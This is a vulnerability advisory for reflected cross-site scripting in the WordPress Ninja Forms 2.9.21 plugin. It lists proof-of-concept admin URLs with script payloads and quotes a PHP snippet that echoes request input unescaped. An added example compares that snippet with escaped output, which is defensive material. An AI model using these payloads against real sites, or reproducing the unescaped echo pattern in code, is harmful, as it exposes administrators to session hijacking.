WordPress Ninja Forms 2.9.21 Cross Site Scripting

2015.08.04
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Title: WordPress 'Ninja Forms' Plugin - XSS
Version: 2.9.21
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/07/14
Download: https://wordpress.org/plugins/ninja-forms/
Contacted authors: 2015/07/14
==========================================================

## Description:
==========================================================
Forms created with a simple drag and drop interface. Contact forms, Email collection forms, or any other form you want on your WordPress site.

## Reflected XSS:
==========================================================
Certain parameters are used unsanitized in the admin pages.

PoC:
Log in as admin and visit one of the following URLs:

[URL]/wp-admin/admin.php?page=nf-processing&title=<script>alert(123);</script>
[URL]/wp-admin/admin.php?page=nf-processing&action=</script><script>alert(123);</script>
[URL]/wp-admin/admin.php?page=ninja-forms&tab=notifications&form_id=7&id="><script>alert(132);</script>&notification-action=new

It looks like there are more vulnerabilities, since the plugin has code like this:

file: subs-cpt.php (lines 883-891)
...
    if ( isset ( $_REQUEST['ref'] ) ) {
        $ref = $_REQUEST['ref'];
    } else if ( get_transient( 'nf_sub_edit_ref' ) ) {
        $ref = get_transient( 'nf_sub_edit_ref' );
    } else {
        $ref = '';
    }
    ?>
    <input type="hidden" name="ref" value="<?php echo $ref; ?>" />
...

## Solution
==========================================================
No fix available.
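Added example (not part of the original advisory and not Ninja Forms code): the echo pattern from subs-cpt.php next to a context-aware escaped form, run against the payloads from the PoC URLs. Assumptions: the function names and the nfAction variable are hypothetical, the `action` parameter is assumed to land inside an inline script block (the PoC payload closes one), and htmlspecialchars()/json_encode() stand in for WordPress's esc_attr()/wp_json_encode() so the file runs with the PHP CLI alone.

```php
<?php
// Added example, not plugin code. Stand-alone: run with `php example.php`.

// Vulnerable pattern from subs-cpt.php: request value echoed raw into an attribute.
function render_ref_vulnerable(string $ref): string {
    return '<input type="hidden" name="ref" value="' . $ref . '" />';
}

// Hardened: escape for the HTML-attribute context at output time.
// Inside WordPress this is esc_attr( $ref ); htmlspecialchars() stands in here.
function render_ref_hardened(string $ref): string {
    $safe = htmlspecialchars($ref, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="ref" value="' . $safe . '" />';
}

// Assumed context for the `action` PoC: the value sits in an inline <script>.
// HTML-entity escaping is the wrong tool there; emit a JSON string literal with
// < > & ' " hex-escaped so the value can never terminate the script block.
// Inside WordPress, wp_json_encode() accepts the same flags.
function render_action_hardened(string $action): string {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<script>var nfAction = ' . json_encode($action, $flags) . ';</script>';
}

// Payloads copied from the advisory's PoC URLs.
$attrPayload   = '"><script>alert(132);</script>';
$scriptPayload = '</script><script>alert(123);</script>';

$before = render_ref_vulnerable($attrPayload);
$after  = render_ref_hardened($attrPayload);
$script = render_action_hardened($scriptPayload);

echo "vulnerable attribute: $before\n";
echo "hardened attribute:   $after\n";
echo "hardened script:      $script\n";

// Checks: the raw form carries a live tag; the escaped forms do not.
if (strpos($before, '<script>') === false) {
    throw new RuntimeException('expected the raw echo to contain the tag');
}
if (strpos($after, '<script>') !== false || strpos($after, '"">') !== false) {
    throw new RuntimeException('attribute escaping failed');
}
if (substr_count($script, '</script>') !== 1) {
    throw new RuntimeException('script-context escaping failed');
}
```

The same review applies to every place a plugin echoes `$_REQUEST`, `$_GET` or transient values: pick the escaper by output context (attribute, element body, script, URL), not by input source.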



Copyright 2024, cxsecurity.com